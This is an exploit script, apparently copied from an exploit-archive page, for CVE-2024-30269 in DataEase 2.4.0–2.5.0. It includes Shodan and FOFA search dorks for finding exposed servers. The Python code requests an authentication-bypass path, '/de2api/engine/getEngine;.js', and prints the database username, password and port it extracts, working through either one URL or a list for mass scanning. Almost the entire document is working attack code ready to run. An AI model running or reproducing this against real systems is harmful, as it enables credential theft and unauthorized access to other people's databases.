<\/p>\n
################################################################
\n############################ #
\n#- Exploit Title: DataEase Database Creds Extractor #
\n#- Shodan Dork: http.html:\"dataease\" #
\n#- FOFA Dork: body=\"dataease\" && title==\"DataEase\" #
\n#- Exploit Author: ByteHunter #
\n#- Email: 0xByteHunter@proton.me #
\n#- vulnerable Versions: 2.4.0-2.5.0 #
\n#- Tested on: 2.4.0 #
\n#- CVE : CVE-2024-30269 #
\n############################ #
\n################################################################
\n
\nimport argparse
\nimport requests
\nimport re
\nimport json
\nfrom tqdm import tqdm
\n
\ndef create_vulnerability_checker():
\n vulnerable_count = 0
\n
\n def check_vulnerability(url):
\n nonlocal vulnerable_count
\n endpoint = \"\/de2api\/engine\/getEngine;.js\"
\n full_url = f\"{url}{endpoint}\"
\n headers = {
\n \"Host\": url.split('\/')[2],
\n \"Accept-Encoding\": \"gzip, deflate, br\",
\n \"Accept\": \"*\/*\",
\n \"Accept-Language\": \"en-US;q=0.9,en;q=0.8\",
\n \"User-Agent\": \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.6045.159 Safari\/537.36\",
\n \"Connection\": \"close\",
\n \"Cache-Control\": \"max-age=0\"
\n }
\n
\n try:
\n response = requests.get(full_url, headers=headers, timeout=5)
\n if response.status_code == 200:
\n try:
\n json_data = response.json()
\n config = json_data.get(\"data\", {}).get(\"configuration\", None)
\n
\n if config:
\n config_data = json.loads(config)
\n
\n username = config_data.get(\"username\")
\n password = config_data.get(\"password\")
\n port = config_data.get(\"port\")
\n
\n if username and password:
\n vulnerable_count += 1
\n print(f\"Vulnerable: {full_url}\")
\n print(f\"Username: {username}\")
\n print(f\"Password: {password}\")
\n if port is not None:
\n print(f\"Port Number: {port}\")
\n
\n except (json.JSONDecodeError, KeyError):
\n print(f\"Invalid JSON response from {full_url}\")
\n
\n except requests.RequestException:
\n pass
\n
\n return vulnerable_count
\n
\n return check_vulnerability
\n
\ndef main():
\n parser = argparse.ArgumentParser(description=\"CVE-2024-30269 DataEase Database Creds Extractor\")
\n parser.add_argument('-u', '--url', type=str, help='Single target')
\n parser.add_argument('-l', '--list', type=str, help='URL File List')
\n args = parser.parse_args()
\n
\n check_vulnerability = create_vulnerability_checker()
\n
\n if args.url:
\n check_vulnerability(args.url)
\n elif args.list:
\n try:
\n with open(args.list, 'r') as file:
\n urls = [url.strip() for url in file.readlines() if url.strip()]
\n total_urls = len(urls)
\n for url in tqdm(urls, desc=\"Processing URLs\", unit=\"url\"):
\n check_vulnerability(url)
\n # tqdm.write(f\"Vulnerable Instances: {check_vulnerability(url)}\/{total_urls}\")
\n except FileNotFoundError:
\n print(f\"File not found: {args.list}\")
\n else:
\n print(\"provide a URL with -u or a file with -l.\")
\n
\nif __name__ == \"__main__\":
\n main()\n <\/code><\/pre>\n<\/p><\/div>\n